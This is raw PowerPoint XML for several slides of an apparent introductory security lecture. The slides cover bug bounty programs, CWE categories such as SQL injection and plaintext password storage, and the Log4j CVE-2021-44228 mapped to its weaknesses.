        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2838435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923FA84-07F6-C538-1F8F-BF26F556F36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C082ACD-588B-3468-5425-26006A286BBA}"/>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4E2D7F8E-8B7D-DAB6-F91E-9613BA9E0B89}"/>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BEE97462-1EB5-52EC-48AB-C56D8428BAF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B3A02787-6A3E-9B95-4FB4-C4F776F11AB1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B6F15528-21DE-4FAA-801E-634DDDAF4B2B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6497EE8-C066-20EE-6018-8F64444A65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5EA5627-EC20-0E20-EE9A-14DFD7434766}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="667774" y="381000"/>
            <a:ext cx="10134600" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Bug Bounty </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>programs offer monetary rewards for ethical hackers for successfully discovering and reporting a vulnerability</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61B58692-29FF-A65E-8934-EE445CEFC3BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828800" y="1447800"/>
            <a:ext cx="7265130" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://hackerone.com/bug-bounty-programs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7FD4A326-4DFA-E22B-54BA-44832EDCBEE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="655074" y="3122634"/>
            <a:ext cx="3496163" cy="2543530"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D54DBE57-9B12-B563-47F8-400EFFACA10C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3429000" y="2514600"/>
            <a:ext cx="2961019" cy="3653313"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1723363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327E55A-2C9B-5794-94D5-E38225BAD812}"/>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0911FC5-779C-DDD4-8F32-C6F92CA02047}"/>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0EDFC335-1461-3E86-E47C-58B5A75D377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E8CA3932-D37E-8770-F9B2-D60C8252F03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ADC16560-16F4-6D15-9EDD-DE6D56331807}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B6F15528-21DE-4FAA-801E-634DDDAF4B2B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B430FB0C-A582-E9D6-3057-FAC32B6BFC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9B4C55E-95AE-810A-B1E3-D25DB433A0A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="616974" y="304800"/>
            <a:ext cx="10172700" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Common Weakness Enumeration (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>CWE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>) are categories of commonly-seen weakness that can lead to vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A3D9FD6-4B7E-097C-AB86-AEBCDB584E1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905000" y="1135797"/>
            <a:ext cx="6926896" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>CVEs are typically mapped to one or more CWEs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3EF38BE8-BF08-F9CC-3E29-CF954FEC4BF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="616974" y="2040235"/>
            <a:ext cx="4267200" cy="3957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CWE-89</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Improper Neutralization of Special Elements used in an SQL Command</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A336B18-7D56-8FBC-E49F-DA75642A2D8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5410200" y="2836698"/>
            <a:ext cx="5257800" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>“The developer did not sanitize user input or remove potential SQL-recognized characters ( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>; -- ‘ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>)”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9EBC7CCE-101E-F394-BB09-30CEBF378873}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5562600" y="4434752"/>
            <a:ext cx="4267200" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>This is a weakness, which under certain circumstances, could be exploited</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B00B7697-D2D2-556D-A78E-73EDC2B113EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="757391" y="6476091"/>
            <a:ext cx="3890809" cy="369332"/>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https://cwe.mitre.org/data/index.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1777129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2AEC927-B32D-BED2-279B-D86CB43DA12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B9977AD2-05BE-F92C-BD25-E7B8F6B7517C}"/>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EC098EA4-27E2-0D5A-B1ED-E9811791E6E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9D13BCD0-01D5-4386-3C1B-B9E71CEB00F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E46164F5-DF3A-E37E-6030-51BE0CE1AE9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B6F15528-21DE-4FAA-801E-634DDDAF4B2B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B00174C2-6159-4883-119A-871D4A741C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E66C700-04AA-7CAE-814D-BA5F7F24062A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="616974" y="304800"/>
            <a:ext cx="10172700" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Common Weakness Enumeration (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>CWE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>) are categories of commonly-seen weakness that can lead to vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D600D48-8908-8380-9309-63C003D8FE38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905000" y="1135797"/>
            <a:ext cx="6926896" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>CVEs are typically mapped to one or more CWEs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD97B6FB-A06B-2370-C121-89EDBA3E50F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="757391" y="6476091"/>
            <a:ext cx="3890809" cy="369332"/>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https://cwe.mitre.org/data/index.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A35D490F-FE86-65C1-37C2-0FC2916F05DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="591574" y="1828800"/>
            <a:ext cx="3705742" cy="428685"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEEA9CAA-CFB3-9A4E-9DE3-437D5C3E6F6C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="591574" y="2488823"/>
            <a:ext cx="3975710" cy="38431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CWE-256</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Plaintext Storage of Password</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3C0E672-E2BE-CE78-0674-23CAC5046B2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5867400" y="2828835"/>
            <a:ext cx="4385152" cy="1938992"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Storing passwords in plaintext is a horrible idea for many reasons, and creates many different weaknesses in the system</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="420755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DA544EC-20FF-CD57-59AF-0C0173B423A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3AD8CFC3-E9DB-E291-9EC5-51DA90E2B963}"/>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38CFF598-CF60-40C8-0582-FA898096A3F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78C25B9B-D24A-6EB8-5A8A-84030297987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7ADAFD34-FDB2-C3AC-C2FC-E17ACD830C22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B6F15528-21DE-4FAA-801E-634DDDAF4B2B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B982DBD-F2DD-6564-09B8-A4A83297FF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A6AE157-DAAF-7468-6566-D8C0A50440BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="616974" y="304800"/>
            <a:ext cx="10172700" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Common Weakness Enumeration (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>CWE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>) are categories of commonly-seen weakness that can lead to vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4574861C-F0DB-9C1C-68D8-2C091C98CCED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905000" y="1135797"/>
            <a:ext cx="6926896" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>CVEs are typically mapped to one or more CWEs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{276CBA41-783B-B6A1-3408-C75F7B00A3E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="757391" y="6476091"/>
            <a:ext cx="5705408" cy="369332"/>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https://www.cve.org/CVERecord?id=CVE-2021-44228</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 2" descr="Log4j - Wikipedia">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7B06D7B-C645-3206-5CBD-9306757D60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429000"/>
            <a:ext cx="2597175" cy="10740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5C5FA2-0F0C-C8BD-7C6B-AB3895984AD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="393700" y="2967335"/>
            <a:ext cx="2730235" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CVE-2021-44228</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="Straight Arrow Connector 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8E648A8-FD6D-0AAB-4270-C838FB9607D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3429000" y="2590800"/>
            <a:ext cx="16764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CB0EB5-B78B-E51D-1232-E8B35FDFF876}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3429000" y="38100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1C6F3B-7049-DF39-0FE7-E5F6CFA26F31}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3429000" y="4038600"/>
            <a:ext cx="16002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A5B5BE-FC65-7638-9B64-C86CF0B609BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5410465" y="2320220"/>
            <a:ext cx="6248400" cy="6813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Deserialization of Untrusted Data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Rectangle 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A939070-98D4-90F8-24A4-21834520C04D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5410465" y="3457556"/>
            <a:ext cx="6248400" cy="6813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Uncontrolled Resource Consumption</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Rectangle 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81F59385-78C8-38DF-BB87-EC52955351D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5454625" y="4688532"/>
            <a:ext cx="6248400" cy="6813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Improper Input Validation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
